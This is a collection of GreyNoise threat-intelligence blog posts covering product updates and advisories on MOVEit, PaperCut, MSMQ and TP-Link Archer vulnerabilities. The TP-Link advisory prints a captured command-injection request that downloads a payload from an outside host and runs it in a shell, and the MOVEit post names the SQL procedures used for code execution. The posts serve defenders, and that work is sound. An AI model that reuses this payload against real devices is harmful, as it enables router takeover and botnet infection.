  • Use a compliance automation platform to save time and effort
  • Break out compliance with the framework into phases, with the audit happening last
  • Plan to build a compliance team to manage the process in the future
  • Treat documentation as a first-class citizen as early as possible
  • Use SOC2 to change process for the better, not just as a compliance checkbox

Your organization can approach SOC2 compliance the easy way or the hard way. The easy way is to treat compliance like a checkbox and do the minimum to pass the audit. The hard way is to take the input and output from the framework and make significant changes to processes to bake in security as a priority early on for everyone. For those serious about security, the hard choice is easy to make.

GreyNoise Round Up: Product Updates - May 2023

May brought more product enhancements to user workflows, data coverage… and of course, more interesting tags! Twenty-four to be exact, as we continue to improve our product to help our customers monitor emerging threats and identify benign actors. We expanded our sensor coverage to include Ghana, plus we made some helpful improvements to our bulk analysis, RIOT dataset, and APIs.

Improvement to Bulk Analysis: Export Unknown IPs

The Bulk Analysis function in the GreyNoise Visualizer has been improved so that users can now export unidentified IPs via CSV and JSON.  

This improvement helps analysts more easily identify the ‘interesting’ IPs in a bulk dataset that they are analyzing (IPs identified by GreyNoise are known common scanners or common business services; IPs that are UNKNOWN in GreyNoise could represent a targeted threat or something that requires additional investigation).

To access this feature, go to the GreyNoise Analysis page and analyze a file or dataset containing IP addresses.

Improvements to Destination Metadata: Sensor Hits

Two fields have been added to the metadata returned via Bulk Data, IP Context API, and GNQL API that will help users determine baselines or rates of activity:

  • metadata.sensor_hits is the amount of unique data the sensor has recorded from the queried IP.
  • metadata.sensor_count is the number of our sensors from which the IP address or behavior has been observed.
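As a rough illustration of how these two fields could feed a baseline, the sketch below computes average hits per sensor for one record. The nested record shape and the helper name `hits_per_sensor` are assumptions made for this example; only the two field names come from the description above.

```python
from typing import Optional


def hits_per_sensor(record: dict) -> Optional[float]:
    """Return sensor_hits divided by sensor_count, or None if either is missing or zero."""
    metadata = record.get("metadata", {})
    hits = metadata.get("sensor_hits")
    count = metadata.get("sensor_count")
    if not hits or not count:
        return None
    return hits / count


# Hypothetical record; the IP is from a documentation-only range.
example = {"ip": "203.0.113.7", "metadata": {"sensor_hits": 120, "sensor_count": 8}}
print(hits_per_sensor(example))  # 15.0
```

A ratio like this is only one possible baseline; tracking the raw values over time may be just as useful.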

RIOT: Qualys Scanner IPs added

We are now tracking Qualys scanner IP addresses in our RIOT database of common business services, so that customers can whitelist this activity (should they wish to) or contextualize this activity when seen in their security logs.

RIOT identifies IPs from known benign services and organizations that commonly cause false positives in network security and threat intelligence products. The collection of IPs in RIOT is continually curated and verified to provide accurate results.

New and Updated Integrations

Splunk Improvements: High Volume Enrichment, IP Similarity and IP Timeline Support

The GreyNoise App for Splunk has been updated to include a new Feed component, which allows users to ingest the GreyNoise indicator feed into Splunk to be used for high-volume log enrichment. Additionally, new dashboards and commands have been added to support the IP Similarity and IP Timeline tools.  Learn More

ThreatQ Improvements: New Actions for ThreatQ Orchestrator

ThreatQ has released new GreyNoise Actions for the Orchestrator platform which allow for IP Similarity, RIOT and Quick lookups against the GreyNoise API. These updates can be downloaded from the ThreatQ Marketplace.  Learn More

Tags Coverage Enhancements

In May, GreyNoise added 24 new tags:

20 malicious activity tags

3 benign actor tags

1 unknown tag

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert informing them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389

On Monday, May 1, 2023, CISA added CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389 to the Known Exploited Vulnerabilities (KEV) list.  For all three CVEs, GreyNoise users had visibility into which IPs were attempting mass exploitation prior to their addition to the KEV list. GreyNoise tags allow organizations to monitor and prioritize the handling of alerts regarding benign and, in this case, malicious IPs.

Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

On May 31st, 2023 Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023.

Sensor Coverage Enhancements: Ghana

We’ve added sensor coverage in Ghana.

You can view which IPs are seen scanning sensors in certain countries from our IP details page, or use `destination_country:"<country_name>"` in GNQL to find IPs that have hit those regions.  Destination country search is available in all commercial plans for GreyNoise and to our community VIP users.

Start for Free

Progress’ MOVEit Transfer Critical Vulnerability: CVE-2023-34362

GreyNoise recommends reviewing systems for any indicators of unauthorized access that may have occurred within the past 90 days.

On May 31st, 2023 Progress issued a security notice to users of MOVEit Transfer regarding a vulnerability that allows for escalated privileges and potential unauthorized access to the environment. CVE-2023-34362 was assigned to this vulnerability on June 2, 2023. The MOVEit Transfer tag can be viewed here.


Progress’ security notice advises users to review their systems for unauthorized access for “at least the past 30 days”. However, GreyNoise has observed scanning activity for the login page of MOVEit Transfer, located at /human.aspx, as early as March 3rd, 2023. While we have not observed activity directly related to exploitation, all five IPs we have observed attempting to discover the location of MOVEit installations were marked as “Malicious” by GreyNoise for prior activities.

Based on the scanning activity we have observed, it is our recommendation that users of MOVEit Transfer should extend the time window for their review of potentially malicious activity to at least 90 days.

The primary artifact, observed through publicly available information, is the presence of a webshell named human2.aspx. This is a post-exploitation file artifact that is written to the filesystem by a malicious actor allowing them to execute arbitrary commands.

GreyNoise is observing scanning activity looking to identify the presence of the human2.aspx webshell dropped as part of the post-exploitation activity.

While the specific details of the initial exploitation vector are largely unknown at this time, we would like to provide the following items and details to our customers and community:

  • Several cybersecurity vendors are covering the subject including Rapid7 and TrustedSec
  • Rapid7 is indicating the initial vector may be a SQL injection vulnerability leading to remote code execution (SQLi-to-RCE)
  • Progress MOVEit Transfer is deployed with a Microsoft SQL (MSSQL) or MySQL backing database
  • The login page of Progress MOVEit Transfer is located at /human.aspx
  • Common paths to achieve remote code execution through SQL injection include the usage of the following T-SQL commands:
      • xp_cmdshell
      • sp_OACreate
      • sp_OAMethod
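For the 90-day review recommended above, one starting point is to sweep web server logs for the two paths named in this post. The sketch below is a minimal example under stated assumptions: it treats each log entry as a line of text containing the requested URI, and the sample lines are hypothetical. It counts requests for the /human.aspx login page and for the human2.aspx webshell artifact, and is not GreyNoise's detection logic.

```python
import re
from collections import Counter
from typing import Iterable, Optional

# Matches the login page (/human.aspx) and the webshell artifact (/human2.aspx).
_PATH_RE = re.compile(r"/human2?\.aspx", re.IGNORECASE)


def classify_log_line(line: str) -> Optional[str]:
    """Return 'webshell', 'login', or None for a single log line."""
    match = _PATH_RE.search(line)
    if match is None:
        return None
    return "webshell" if match.group(0).lower() == "/human2.aspx" else "login"


def summarize(lines: Iterable[str]) -> Counter:
    """Count login-page and webshell requests across log lines."""
    return Counter(kind for kind in map(classify_log_line, lines) if kind)


# Hypothetical log lines for illustration only.
sample = [
    "2023-05-30 12:00:01 GET /human.aspx - 443 198.51.100.9",
    "2023-05-30 12:00:07 GET /human2.aspx - 443 198.51.100.9",
    "2023-05-30 12:01:00 GET /index.html - 443 192.0.2.44",
]
print(summarize(sample))
```

Any request for human2.aspx deserves a closer look, whether it was a scan from outside or a sign the file exists on disk.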

Last but not least, a big thank you to the GreyNoise community for alerting us to this activity early on.

Enhancing Threat Detection and Response

The Situation

Threat hunters spend a significant portion of their time searching through security logs looking for specific Indicators of Compromise (IoCs) or patterns of activity/behavior that indicate compromise. This work comes with some specific challenges: 

  • Too Many Tools, Too Much (Nonsense) Data: Oftentimes, threat hunters end up with log files or results pages showing long lists of suspicious events (including related IP addresses), and it can take many hours to work through this information to filter and identify malicious activity. 
  • Time Spent Clustering: Identifying infrastructure used by adversaries is a time consuming process.
  • Building Early (but reliable) Detections: Detections developed to identify malicious activity can generate false positives or get outdated quickly if they are based on non-current data.

Techniques to Improve the situation

To enhance threat hunting and address some of these pain points, organizations can use tools like GreyNoise in conjunction with a SIEM or SOAR platform. This helps them quickly identify and investigate potential threats, get more out of their existing tools, and filter through data sources faster. By understanding how infrastructure is being used, which vulnerabilities are being leveraged, and what scan patterns look like, threat hunters can gain valuable context on how adversaries operate and improve their response to threats.

Recently, we held a webinar on this topic, where we discussed how organizations are using specific techniques in their day-to-day operations. To streamline your threat hunting process, sign up to download the webinar today and learn:

  • How to use GreyNoise features and SOAR playbooks to hunt, detect, and defend.
  • The ins and outs of analyzing logs to identify potential DDoS attacks and how to respond to them effectively.
  • Tips and tricks for incorporating vulnerability intelligence into your threat intel reports, which can help you stay ahead of emerging threats.

Announcing the GreyNoise Ambassador Program: Empowering Community Members to Make a Difference

GreyNoise is built on a strong foundation of mutual respect from our community. While we love doing swag drops on Twitter (or maybe Bluesky - anyone have an invite?), we wanted to recognize community members that go above and beyond. 

Enter the GreyNoise Ambassador Program! We couldn’t think of a better way to celebrate our users' constant support, spirit of collaboration, and mentorship within our community. I’m here to answer all your burning questions about the program and how you can apply!

Who Is the Ideal Ambassador?

Ambassadors are pillars of the GreyNoise Community. This program celebrates their efforts to support community growth and accessibility, focusing on three key elements:

  • Collaboration: This is not only sharing information, detection, or memes with the team at GreyNoise but with each other! We all win when we share.
  • Mentorship: People who are helpful and educate their peers.
  • Transparency: This is a core GreyNoise belief that you can and should be honest whenever possible.

Ambassadors are folks who have dedicated time and resources to bettering GreyNoise, whether through continuous feedback, bug reports, integrations, conference talks, or simply a deep dedication to reducing Internet Noise.

Why Join the Ambassador Program?

If you are on the fence about being an ambassador, let us tell you about the perks you get: 

  • Premium swag (see below) 
  • 5 VIP passes to give out to your friends, in line with our VIP guidelines 
  • Early access testing for any new GreyNoise features and products (including the forthcoming GreyNoise honeypot) 
Swag sneak peek!

What Is Expected of Me As An Ambassador?

In exchange for being our Ambassador, we ask that you do one or more of the following:

  • Lead a “How I Use GreyNoise” session (these can be pre-recorded or live & public)
  • Participate in a product feedback session
  • Write a guest blog
  • Speak at a GreyNoise event (In person or virtual!) 
  • Continue to spread the word about GreyNoise :) 

Your term as an Ambassador will last a year, and when Spring 2024 rolls around, you will be asked to reapply.

How Do I Apply?

If this all sounds good to you, we ask that you fill out this application. We will evaluate applications until the end of May and send notice to our Ambassadors in early June!

If you have any questions, don’t hesitate to reach out to the Community team.

via Twitter

Internet Noise Search School with the GreyNoise Product Team - Searching for Words

As a Product Manager at GreyNoise, I’m constantly learning about how our users think about internet noise and accordingly search our data with the GreyNoise Query Language (GNQL). It might surprise you (or not) that we see some pretty random searches.

As evidenced by our 2000s style word cloud, users have been searching anything from “log4shell” to “lockbit” to “mcdonalds.” While GreyNoise search is not a threat actor Google, we do have a lot of data on interesting threats. Let me clear up our search bar for those of us who want to improve our ninja search skills.

What can you search for in GreyNoise?

The answer is anything, which is why you should use GNQL searches!

When you throw a word into the GreyNoise Viz search bar, we treat it like a free text search, where we search all of our data for that term - so this means if you search “banana,” we will return the IP addresses that have scanned for the “/banana/” directory. But we might also return IPs with “banana” in their user agent.

The GNQL way of guaranteeing you only get IPs with “banana” in the HTTP web paths is to utilize the raw_data.web.paths field selector. The search for our banana path would look like raw_data.web.paths:"/banana/"
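If you build these field-selector searches in a script, the pattern is simply `field:"value"`. The sketch below assembles such a query and a request URL for it. The endpoint path and the `query`/`size` parameter names are assumptions based on the public GreyNoise v2 API and should be checked against the current API documentation; the helper names are hypothetical, and no request is actually sent.

```python
from urllib.parse import urlencode

# Assumed endpoint; verify against the current GreyNoise API documentation.
GNQL_ENDPOINT = "https://api.greynoise.io/v2/experimental/gnql"


def field_query(field: str, value: str) -> str:
    """Build a GNQL field-selector term such as raw_data.web.paths:"/banana/"."""
    if '"' in value:
        raise ValueError("this sketch does not handle double quotes in values")
    return f'{field}:"{value}"'


def gnql_url(query: str, size: int = 10) -> str:
    """Return a URL-encoded request URL for the query (nothing is fetched here)."""
    return f"{GNQL_ENDPOINT}?{urlencode({'query': query, 'size': size})}"


query = field_query("raw_data.web.paths", "/banana/")
print(query)
print(gnql_url(query))
```

The same helper works for the other selectors mentioned in this post, such as raw_data.web.useragents and metadata.organization.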

(15 results!)

More fun with field selectors in GNQL is in our Cheat Sheet.

If you’re looking for an exceptional user agent or organization, we also have field selectors: raw_data.web.useragents and metadata.organization respectively.

For the searches that are word-based but land outside web paths, user agents, and organizations, we have a few other categories they might fall into - Actors, Tools, Botnets, and Techniques. For these, I recommend searching our tags. This is as easy as going to the tags page and utilizing the tag search bar, where we can return all our tags containing your search term.

As for threat groups - at this time, GreyNoise does not dabble in attribution to threat groups. If you’re trying to track down a particular group, we recommend identifying IoCs that the group may use. We have found initial reconnaissance IPs from other research groups’ reports lurking in our data, along with web paths that may indicate compromise by C2/botnet activity.

I hope these tips helped level up your GreyNoise search skills to help you find what you’re looking for even faster. Create deep dives into something haunting you using our Cheat Sheet, and stay tuned for more internet noise search tips soon!

Get Started With GreyNoise for Free

Trinity Cyber + GreyNoise: Sharing Intelligence to Protect Internet Citizens

At GreyNoise we recognize the value of partnership and intelligence sharing when it comes to protecting internet citizens. Today the GreyNoise Labs team wants to give a shoutout to Trinity Cyber.

Last week the Threat Analysis team at Trinity Cyber reached out to GreyNoise providing evidence of exploitation for CVE-2023-1389, a command injection vulnerability in TP-Link Archer AX21 firmware. With the provided information, in under two hours, GreyNoise deployed a tag to detect and confirm exploitation in the wild. You can read more about this here.

Shortly after shipping that tag, Trinity Cyber then provided evidence for five more CVEs which we were able to get tagged and published this week for all of our users! They are as follows:

  • CVE-2023-0640: a remote code execution vulnerability in TRENDnet TEW-652BRP
  • CVE-2023-27240: a remote code execution vulnerability in Tenda AX3
  • CVE-2019-20500: a remote code execution vulnerability in D-Link DWL-2600AP
  • CVE-2022-29303: a remote code execution vulnerability in Solarview Compact 6
  • CVE-2022-27002: a remote code execution vulnerability in Arris TR3300 

Thank you for your transparency and continued support, Trinity Cyber! Together we make the internet safer.

Want to partner with GreyNoise? Learn More >>

GreyNoise Round Up: Product Updates - April 2023

GreyNoise added a number of exciting updates in April, including 20 new tags for users to monitor emerging vulnerabilities and threats, and identify benign actors. We’ve also added integration updates to support our new IP Similarity and Timeline features, and enhancements to the IP Similarity capability to improve accuracy and give users a summary view to easily understand similar IP infrastructure.

IP Similarity Enhancements 

New IP Similarity Summary View

We’ve enhanced our IP Similarity feature with a summary view that breaks down the high level summary of what fields we found similar in our dataset, and allows customers to quickly scan for common fields and tags.  IP Similarity is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

IP Similarity Model Updates

We've updated the algorithm used by our IP Similarity to improve accuracy through several changes. Feature vectors are scaled and normalized to increase the distance between low and high information numbers, resulting in lower similarity scores. Bugs related to tokenizing user agent and web path strings were fixed, and options like 'unknown' and certain domain names were excluded. Values for webpath, rDNS, OS, and ports were adjusted, resulting in a feature vector with 693 items. Lastly, the minimum info threshold was raised to help improve accuracy of results.
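To see why scaling features before comparison can lower similarity scores, here is a toy sketch. It is not GreyNoise's model: the three-element vectors, the weights, and the use of cosine similarity are all assumptions chosen only to illustrate the general idea that up-weighting a high-information feature pushes two otherwise similar vectors apart.

```python
import math
from typing import Sequence


def cosine_similarity(a: Sequence[float], b: Sequence[float]) -> float:
    """Cosine similarity of two equal-length vectors (0.0 if either has zero length)."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    if norm_a == 0 or norm_b == 0:
        return 0.0
    return dot / (norm_a * norm_b)


def scale(vec: Sequence[float], weights: Sequence[float]) -> list:
    """Multiply each feature by its weight."""
    return [x * w for x, w in zip(vec, weights)]


# Two hypothetical IPs that share two features and differ on a third.
ip_a = [1.0, 1.0, 0.0]
ip_b = [1.0, 1.0, 1.0]
weights = [1.0, 1.0, 3.0]  # assumed: the third feature carries more information

unweighted = cosine_similarity(ip_a, ip_b)
weighted = cosine_similarity(scale(ip_a, weights), scale(ip_b, weights))
print(round(unweighted, 3), round(weighted, 3))  # the weighted score is lower
```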

IP Timeline Enhancements 

90 Days of IP Timeline Data Now Available

We’ve enhanced our IP timeline feature to store up to 90 days of IP history data (previously, we provided up to 60 days of data) to enable customers to better understand historical IP activity when threat hunting or performing incident response.  IP Timeline is available to paying customers and to our community VIP users: start a trial* today to explore or learn more about this feature.

New and Updated Integrations

Integration Update: Anomali ThreatStream Enrichment

We updated our Anomali ThreatStream Enrichment to include our IP Similarity and IP Timeline features. From the context of an observable, customers can now see all details GreyNoise knows, plus view similar IPs and the timeline of observed activity. Learn More

New Integration: Anomali ThreatStream Malicious IP Feed

Our Malicious IP Feed is now available on the Anomali ThreatStream marketplace. Customers can now easily subscribe to the feed and get a daily update of malicious IPs that GreyNoise observed scanning the internet in the last 24 hours. Learn More

Integration Update: Splunk SOAR

We updated our Splunk SOAR integration to introduce two new commands: "similar noise ips" and "noise ip timeline". These commands pull data from the GreyNoise IP Similarity and IP Timeline features and allow customers to bring that context into Splunk SOAR for an analyst to use during an investigation.  Learn More

Integration Update: Maltego

We updated our Maltego Enterprise transform set to include a new Transform that allows for users to query for Similar IPs.  This leverages the new IP Similarity tool, and allows for Maltego users to bring similar IPs into their graph for additional research and correlation within Maltego.  Learn More

Integration Update: GreyNoise SDK

The GreyNoise SDK has been updated to include both CLI and API based commands to interact with the new IP Timeline and IP Similarity APIs. Learn More

Tags Coverage Enhancements

In the month of April, GreyNoise added 20 new tags:

10 malicious activity tags

6 benign actor tags

4 unknown activity tags

All GreyNoise users can monitor scanning activity we’ve seen for a tag by creating an alert that will inform them of any new IPs scanning for tags they are interested in.

Notable Security Research and Detection Engineering Blogs:

Change in ENV Crawler Tags as Bots Continue to Target Environment Files

On Tuesday, April 25, 2023, GreyNoise is changing how we classify environment file crawlers from unknown intent to malicious intent.  At the time of publication, this change will result in the reclassification of over 11,000 IPs as malicious.  Users who use GreyNoise’s malicious tag to block IPs based on malicious intent will see an increase in blocked IPs.

Active Exploitation Attempts (CVE-2023-1389) Against TP-Link Archer Gigabit Internet Routers

In collaboration with our partner Trinity Cyber, GreyNoise has a new tag for scan traffic related to CVE-2023-1389, a pre-auth command injection weakness in TP-Link Archer routers.

New Vulnerability: PaperCut MF/NG

On Friday, April 21, 2023, CISA added CVE-2023-27350 (a critical unauthenticated remote code execution vulnerability) impacting PaperCut MF and PaperCut NG to the Known Exploited Vulnerabilities (KEV) list.  PaperCut MF and PaperCut NG are both enterprise printer management software. 

A Trio of Tags For Identifying Microsoft Message Queue Scanners And Exploiters Live Now - QueueJumper (CVE-2023-21554)

Check Point Research discovered three vulnerabilities in Microsoft Message Queuing (MSMQ) service, patched in April's Patch Tuesday update. The most severe, QueueJumper (CVE-2023-21554), is a critical vulnerability allowing unauthenticated remote code execution. GreyNoise has a tag, classified as malicious, for the full QueueJumper RCE Attempt.

Sensor Coverage Enhancements

We’ve added additional sensor coverage for the following countries:

Destination country search is available in all commercial plans for GreyNoise and to our community VIP users. Start a trial* today to explore destination data.

Search Enhancements

The GNQL cheat sheet is now available in the search bar.  Want to learn more about how to effectively use GNQL? Review the cheat sheet for some helpful examples around syntax and available fields to use in search.

(*To begin your GreyNoise Enterprise Trial, sign-in to your account or sign-up for a free account, then go to your account details page and select "Start Trial".)

KEV'd: CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389

On Monday, May 1, 2023, CISA added CVE-2021-45046, CVE-2023-21839, and CVE-2023-1389 to the Known Exploited Vulnerabilities (KEV) list.  For all three CVEs, GreyNoise users had visibility into which IPs were attempting mass exploitation prior to their addition to the KEV list. GreyNoise tags allow organizations to monitor and prioritize the handling of alerts regarding benign and, in this case, malicious IPs.


TP-LINK ARCHER AX21 COMMAND INJECTION VULNERABILITY SCAN | CISA KEV UPDATE: CVE-2023-1389

ORACLE WEBLOGIC CVE-2023-21839 RCE ATTEMPT | CISA KEV UPDATE: CVE-2023-21839


APACHE LOG4J RCE ATTEMPT | CISA KEV UPDATE: CVE-2021-45046

| CVE | CVE Description | Tag Date | KEV Date |
| --- | --- | --- | --- |
| CVE-2021-45046 | Apache Log4j2 contains a deserialization of untrusted data vulnerability due to the incomplete fix of CVE-2021-44228, where the Thread Context Lookup Pattern is vulnerable to remote code execution in certain non-default configurations. | December 9, 2021 | May 1, 2023 |
| CVE-2023-21839 | Oracle WebLogic Server contains an unspecified vulnerability that allows an unauthenticated attacker with network access via T3, IIOP, to compromise Oracle WebLogic Server. | March 6, 2023 | May 1, 2023 |
| CVE-2023-1389 | TP-Link Archer AX-21 contains a command injection vulnerability that allows for remote code execution. | April 25, 2023 | May 1, 2023 |
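To put the gap between tag date and KEV date in numbers, the short sketch below subtracts the two dates listed for each CVE. The dates are taken from the table; the dictionary and function names are just for this example.

```python
from datetime import date

# (tag date, KEV date) pairs as listed for each CVE above.
TAG_AND_KEV_DATES = {
    "CVE-2021-45046": (date(2021, 12, 9), date(2023, 5, 1)),
    "CVE-2023-21839": (date(2023, 3, 6), date(2023, 5, 1)),
    "CVE-2023-1389": (date(2023, 4, 25), date(2023, 5, 1)),
}


def lead_days(tag_date: date, kev_date: date) -> int:
    """Days of tag coverage before the CVE was added to the KEV list."""
    return (kev_date - tag_date).days


for cve, (tag_date, kev_date) in TAG_AND_KEV_DATES.items():
    print(f"{cve}: {lead_days(tag_date, kev_date)} days")
# CVE-2021-45046: 508 days
# CVE-2023-21839: 56 days
# CVE-2023-1389: 6 days
```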

Bonus Update:

On Thursday, April 27, 2023, GreyNoise released a tag for the critically scored CVE-2023-21554, QueueJumper, a Microsoft message queuing remote code execution vulnerability. 

As of this publication, we have not observed mass exploitation attempts, but have observed >600 IPs that are attempting to discover Internet-facing Microsoft Windows devices that respond over Microsoft Message Queuing (MSMQ) binary protocol.

A Trio of Tags For Identifying Microsoft Message Queue Scanners And Exploiters Live Now - QueueJumper (CVE-2023-21554)

2023-04-28 Update

GreyNoise researchers now have a tag, classified as malicious, for the full QueueJumper RCE Attempt. As of the time of this post, no active RCE scanning attempts have been seen in GreyNoise for the past 90 days.

Check Point Research is slated to reveal full technical details later in the day on Friday, April 28, 2023.

MICROSOFT MESSAGE QUEUING (MSMQ) QUEUEJUMPER RCE ATTEMPT | CVE-2023-21554

MICROSOFT MESSAGE QUEUING (MSMQ) CRAWLER | CVES: No associated CVEs

MICROSOFT MESSAGE QUEUING (MSMQ) HTTP CRAWLER | CVES: No associated CVEs


Check Point Research discovered three vulnerabilities in Microsoft Message Queuing (MSMQ) service, patched in April's Patch Tuesday update. The most severe, QueueJumper (CVE-2023-21554), is a critical vulnerability allowing unauthenticated remote code execution. The other two vulnerabilities involve unauthenticated remote DoS attacks:

  • CVE-2023-21769 — unauthenticated Remote Application Level DoS (service crash)
  • CVE-2023-28302 — unauthenticated Remote Kernel Level DoS (Windows BSOD)

MSMQ, though considered a “legacy” service, is still available on all Windows operating systems.

According to Check Point researchers, over 360,000 IPs have the 1801/tcp port open, running the MSMQ service. The service may be enabled without user knowledge when installing certain software, such as Microsoft Exchange Server. Exploiting MSMQ vulnerabilities could allow attackers to take over servers. It's crucial for administrators to check their servers and install Microsoft's official patch. If unable to apply the patch, blocking inbound connections for 1801/tcp from untrusted sources can serve as a workaround.
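Administrators who want a quick first check of whether a server they own answers on 1801/tcp could use something like the sketch below. It only tests whether a TCP connection can be opened; it does not speak the MSMQ protocol or confirm the service is vulnerable, and the function name is hypothetical. Only run it against hosts you are authorized to test.

```python
import socket

MSMQ_PORT = 1801  # TCP port used by the MSMQ service, per the post above


def tcp_port_open(host: str, port: int = MSMQ_PORT, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within the timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False


if __name__ == "__main__":
    # Checks the local machine only; replace with hosts you administer.
    print(tcp_port_open("127.0.0.1"))
```

A True result from an untrusted network location suggests the firewall workaround described above is not yet in place.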

GreyNoise researchers have two activity (vs exploitation attempt) tags that detect when someone is scanning to find exposed instances of the MSMQ service:

  • Microsoft Message Queuing (MSMQ) Crawler
  • Microsoft Message Queuing (MSMQ) HTTP Crawler

When we combine these tags, we presently see (at the time of publishing this post) just over 500 unique IP addresses — all from sources we’ve qualified as benign (👋🏼 Censys and Shadowserver!). The most prolific scanning is happening on the non-HTTP endpoint.

GreyNoise strongly recommends that organizations use our blocklists to shut down any identified malicious IPs with extreme prejudice before they have a chance to cause harm.

Our researchers are also hard at work digging into the details of each of the three weaknesses to craft specific exploitation detections which will, by default, be coming from malicious sources.

GreyNoise's detection capabilities for inventory scans of MSMQ protocols provide a reliable and essential tool in identifying and blocking malicious IPs targeting these vulnerabilities. With the accuracy of GreyNoise tags, security professionals can trust the system to highlight potential threats, allowing them to focus on other critical aspects of their organization's security. These IP Blocklists are available to all GreyNoise users now.*

*You must be signed in to access Blocklists. Create an account today. 

New Vulnerability: PaperCut MF/NG

On Friday, April 21, 2023, CISA added CVE-2023-27350 (a critical unauthenticated remote code execution vulnerability) impacting PaperCut MF and PaperCut NG to the Known Exploited Vulnerabilities (KEV) list.  PaperCut MF and PaperCut NG are both enterprise printer management software. 

Originally ZDI-23-233, CVE-2023-27350 (CVSS 9.8) impacts both application servers and site servers for PaperCut MF and NG version 8.0 or later, according to PaperCut, and has been fixed in PaperCut MF and PaperCut NG versions 20.1.7, 21.2.11, and 22.0.9 and later.


PAPERCUT RCE ATTEMPT | CISA KEV UPDATE: CVE-2023-27350


PAPERCUT AUTHENTICATION BYPASS CHECK | CISA KEV UPDATE: CVE-2023-27350


The inclusion of this vulnerability on the KEV list implies that exploitation has been confirmed in the wild. Additionally, the PaperCut advisory also points out reports of exploitation dating back to April 13, 2023, 15:29 UTC.  

GreyNoise has published two tags related to this PaperCut vulnerability:

  • PaperCut RCE Attempt: IP addresses with this tag have been observed attempting to exploit CVE-2023-27350, an authentication bypass vulnerability in PaperCut MF/NG that could result in remote code execution.
  • PaperCut Authentication Bypass Check: IP addresses with this tag have been observed checking for the existence of CVE-2023-27350, an authentication bypass vulnerability in PaperCut MF/NG.

At the time of publication, GreyNoise has not observed mass exploitation of this vulnerability but has observed two IPs mass scanning for it. There could be a few reasons for this: exploitation may be happening in a more targeted fashion, or scanning may simply be unnecessary, since a specific Google search returns a few thousand hits that attackers can use to focus their exploitation attempts.

GreyNoise recommends that organizations that use PaperCut follow the vendor's guidance to upgrade and review systems for signs of compromise.  (This information is included in PaperCut’s advisory).

Sign up for a free GreyNoise account or request a demo to see how GreyNoise can help.

While signed in to GreyNoise, click below to set up a daily alert to be notified of new results.

  • Alert for “PaperCut RCE Attempt”
  • Alert for “PaperCut Authentication Bypass Check”

Active Exploitation Attempts (CVE-2023-1389) Against TP-Link Archer Gigabit Internet Routers

Today, in collaboration with our partner Trinity Cyber, GreyNoise has a new tag for scan traffic related to CVE-2023-1389, a pre-auth command injection weakness in TP-Link Archer routers.

TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.

The following is a sample of traffic related to these exploit attempts.

POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
Host: [redacted]
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
Content-Length: 60

operation=write&country=$(id>`wget http://zvub[.]us/y -O-|sh`)
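Requests of this shape can be flagged in your own logs with a simple heuristic. The sketch below is an illustration only, not the logic behind the GreyNoise tag: it assumes you already have the request path and form body as strings, and it treats any shell metacharacter in the country parameter as suspicious. The function name and the metacharacter list are assumptions.

```python
import re
from urllib.parse import parse_qs

# The locale endpoint, with or without the slash before ";stok=" (both forms appear above).
_ENDPOINT_RE = re.compile(r"^/cgi-bin/luci/?;stok=[^/]*/locale\b")
# Characters with no place in a country code but common in shell injection.
_SHELL_META_RE = re.compile(r"[`$;|&<>]")


def looks_like_cve_2023_1389(path: str, body: str) -> bool:
    """Heuristic: locale endpoint plus shell metacharacters in the country parameter."""
    if not _ENDPOINT_RE.match(path):
        return False
    params = parse_qs(body, keep_blank_values=True)
    return any(_SHELL_META_RE.search(value) for value in params.get("country", []))


# Harmless placeholder payloads for illustration.
print(looks_like_cve_2023_1389("/cgi-bin/luci/;stok=/locale?form=country",
                               "operation=write&country=$(id)"))  # True
print(looks_like_cve_2023_1389("/cgi-bin/luci/;stok=/locale?form=country",
                               "operation=write&country=US"))     # False
```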

We have not yet observed a successful injection, so we have published a “scan/crawler” tag, TP-Link Archer AX21 Command Injection Vulnerability Scan, to help organizations identify this activity. We will be working closely with Trinity Cyber and other partners to identify successful malicious mass exploitation attempts.

Tenable initially identified this weakness, and has confirmed that successful exploitation is only likely across WAN interfaces under rare conditions. The Zero Day Initiative (ZDI) has also detected exploit activity and has suggested that their telemetry indicates that the Mirai botnet has updated its arsenal to include this new exploit. They further indicate that exploitation across the WAN interface will likely be difficult, but not impossible.

Organizations should work to patch any known, official deployments of these routers and advise their remote workforce to ensure they apply the appropriate vendor updates as soon as possible if they have them installed at their remote location(s).

Our engineering team is performing a retroactive tagging exercise to determine if we have seen mass exploitation attempts within the previous ninety days. However, Trinity Cyber has shared that they have observed 193.32.162.189 actively engaged in current exploitation attempts.

GreyNoise suggests that, where possible, organizations block this IP address and use our hourly-updated block lists to help keep their infrastructure safe from mass exploitation attempts.

We will provide an update once we have a tag for a confirmed, successful malicious activity for this vulnerability.

Sign up for a free GreyNoise account or request a demo to see how GreyNoise can help.

While signed in to GreyNoise, click below to set up a daily alert to be notified of new results.

  • Alert for “TP-Link Archer Command Injection Probe”

Change in ENV Crawler Tags as Bots Continue to Target Environment Files

Crawlers finding public, unsecured environment files continue to be used to compromise organizations.

